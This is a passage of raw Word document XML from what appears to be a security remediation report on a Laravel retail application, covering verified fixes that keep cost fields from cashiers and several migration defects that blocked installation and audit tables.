                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="809625" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="800100" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="802730" y="0"/>
                                  <a:pt x="804976" y="930"/>
                                  <a:pt x="806835" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="808695" y="4638"/>
                                  <a:pt x="809625" y="6896"/>
                                  <a:pt x="809625" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="809625" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="809625" y="135979"/>
                                  <a:pt x="808695" y="138212"/>
                                  <a:pt x="806835" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="804976" y="141932"/>
                                  <a:pt x="802730" y="142863"/>
                                  <a:pt x="800100"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602" style="width:63.75pt;height:11.25pt;position:absolute;z-index:-2147483589;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:194.93pt;mso-position-vertical-relative:text;margin-top:12.0537pt;" coordsize="8096,1428">
                <v:shape id="Shape 2267" style="position:absolute;width:8096;height:1428;left:0;top:0;" coordsize="809625,142875" path="m9525,0l800100,0c802730,0,804976,930,806835,2778c808695,4638,809625,6896,809625,9525l809625,133350c809625,135979,808695,138212,806835,140072c804976,141932,802730,142863,800100,142875l9525,142875c6895,142863,4650,141932,2790,140072c930,138212,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2624" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="20A06FBE" wp14:editId="45EB8784">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>361057</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>324532</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1276350" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="30603" name="Group 30603"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1276350" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1276350" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2271" name="Shape 2271"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1276350" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1276350" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1266825" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1269455" y="0"/>
                                  <a:pt x="1271700" y="930"/>
                                  <a:pt x="1273560" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1275420" y="4638"/>
                                  <a:pt x="1276350" y="6896"/>
                                  <a:pt x="1276350" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1276350" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1276350" y="135979"/>
                                  <a:pt x="1275420" y="138224"/>
                                  <a:pt x="1273560" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1271700" y="141945"/>
                                  <a:pt x="1269455" y="142875"/>
                                  <a:pt x="1266825" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>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603" style="width:100.5pt;height:11.25pt;position:absolute;z-index:-2147483585;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:28.4297pt;mso-position-vertical-relative:text;margin-top:25.5537pt;" coordsize="12763,1428">
                <v:shape id="Shape 2271" style="position:absolute;width:12763;height:1428;left:0;top:0;" coordsize="1276350,142875" path="m9525,0l1266825,0c1269455,0,1271700,930,1273560,2778c1275420,4638,1276350,6896,1276350,9525l1276350,133350c1276350,135979,1275420,138224,1273560,140084c1271700,141945,1269455,142875,1266825,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138224,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Verified.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The runtime PoC calls each of the five endpoints as a cashier and finds none of eleven confidential field names; each response remains HTTP 200 and retains </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>selling_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>price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The same script </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>confirms</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> an administrator still sees cost fields. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ResponseFilteringTest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> adds 16 regression tests covering all five endpoints, the safe model default, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>null-user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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failclosed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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behaviour</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, and legitimate administrator access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCD96C0" w14:textId="6AD72628" w:rsidR="00345BB3" w:rsidRDefault="00345BB3">
      <w:pPr>
        <w:spacing w:after="559" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C0E4E9" w14:textId="77777777" w:rsidR="0011533D" w:rsidRDefault="0011533D">
      <w:pPr>
        <w:spacing w:after="559" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35DCAD43" w14:textId="77777777" w:rsidR="0011533D" w:rsidRPr="005C54CB" w:rsidRDefault="0011533D">
      <w:pPr>
        <w:spacing w:after="559" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="331D3963" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0" w:rsidP="008C216B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="24"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011533D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>5. Supporting defects fixed in passing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538ADEFA" w14:textId="77777777" w:rsidR="008C216B" w:rsidRPr="008C216B" w:rsidRDefault="008C216B" w:rsidP="008C216B">
      <w:pPr/>
    </w:p>
    <w:p w14:paraId="4D3DB8DE" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="182"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Not headline vulnerabilities, but each one blocked reproducible provisioning or masked a real defect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0909F758" w14:textId="6DEFA978" w:rsidR="008C216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V-19</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="008C216B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The application could not be installed from source.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Three migrations created </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>personal_access_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tokens</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Sanctum's own (auto-loaded) plus two byte-identical application copies. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EA02C7" w14:textId="1F227C5E"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Any clean </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> artisan migrate</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> aborted with error 1050. Invisible to the original team because their database predated the duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53796CE0" w14:textId="0EF31C63" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="0" w:line="322" w:lineRule="auto"/>
        <w:ind w:left="6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4672" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="622A499F" wp14:editId="0B574A0F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>160452</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1628775" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="30606" name="Group 30606"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1628775" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1628775" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2292" name="Shape 2292"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1628775" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1628775" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1619250" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1621880" y="0"/>
                                  <a:pt x="1624125" y="918"/>
                                  <a:pt x="1625985" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1627845" y="4638"/>
                                  <a:pt x="1628775" y="6883"/>
                                  <a:pt x="1628775" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1628775" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1628775" y="126454"/>
                                  <a:pt x="1627845" y="128687"/>
                                  <a:pt x="1625985" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1624125" y="132407"/>
                                  <a:pt x="1621880" y="133338"/>
                                  <a:pt x="1619250" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130547"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123825"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2790" y="2778"/>
                                </a:ln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606" style="width:128.25pt;height:10.5pt;position:absolute;z-index:-2147483564;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:1.42969pt;mso-position-vertical-relative:text;margin-top:12.634pt;" coordsize="16287,1333">
                <v:shape id="Shape 2292" style="position:absolute;width:16287;height:1333;left:0;top:0;" coordsize="1628775,133350" path="m9525,0l1619250,0c1621880,0,1624125,918,1625985,2778c1627845,4638,1628775,6883,1628775,9525l1628775,123825c1628775,126454,1627845,128687,1625985,130547c1624125,132407,1621880,133338,1619250,133350l9525,133350c6895,133338,4650,132407,2790,130547l0,123825l0,9525l2790,2778c4650,918,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V-19</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">b </w:t>
      </w:r>
      <w:r w:rsidR="008C216B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Two audit tables could never be created.</w:t>
      </w:r>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grn_adjustment_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>histories.adjusted</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_by</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return_to_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stock.returned</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_by</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> were declared </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NOT NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then given </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ON DELETE SET NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> foreign keys, which MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285D5213" w14:textId="77777777" w:rsidR="008C216B" w:rsidRDefault="008125F0" w:rsidP="008C216B">
      <w:pPr>
        <w:ind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refuses (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>errno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 150). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7452AC62" w14:textId="1A30DEEE" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="008C216B">
      <w:pPr>
        <w:ind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These are the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>audit</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> tables, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nullOnDelete</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is the deliberate choice to keep history after a staff member is deleted so on any rebuilt environment the stock-adjustment audit trail was simply absent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F4AA60" w14:textId="1E456166" w:rsidR="008C216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V-19</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">c </w:t>
      </w:r>
      <w:r w:rsidR="008C216B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008C216B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Validation and storage disagreed.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users.phone</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_no_02</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
